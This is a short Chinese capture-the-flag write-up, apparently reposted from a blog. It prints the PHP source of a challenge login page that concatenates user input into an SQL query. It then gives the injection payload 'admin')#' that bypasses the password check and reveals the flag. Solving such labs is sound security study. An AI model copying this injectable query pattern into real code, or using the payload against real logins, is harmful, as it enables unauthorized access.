标签:mysq .com post alt ref == orm body admin
<html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ‘:‘ . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($_POST[user]); $pass = md5(trim($_POST[pass])); $sql="select user from ctf where (user=‘".$user."‘) and (pw=‘".$pass."‘)"; echo ‘</br>‘.$sql; $query = mysql_fetch_array(mysql_query($sql)); if($query[user]=="admin") { echo "<p>Logged in! flag:******************** </p>"; } if($query[user] != "admin") { echo("<p>You are not admin!</p>"); } } echo $query[user]; ?> <form method=post action=index.php> <input type=text name=user value="Username"> <input type=password name=pass value="Password"> <input type=submit> </form> </body> <a href="index.phps">Source</a> </html>
trim() 函数移除字符串两侧的空白字符或其他预定义字符。
例如本题双引号里面的都被解析了,所以不用闭合(带双引号)
直接输时是这种情况(发生了过滤)
所以我们直接注入
user=admin‘)#&pass=7321
只管user剩下的注释掉
Logged in! flag:nctf{ni_ye_hui_sql?}
标签:mysq .com post alt ref == orm body admin
原文地址:http://www.cnblogs.com/maodun/p/6917449.html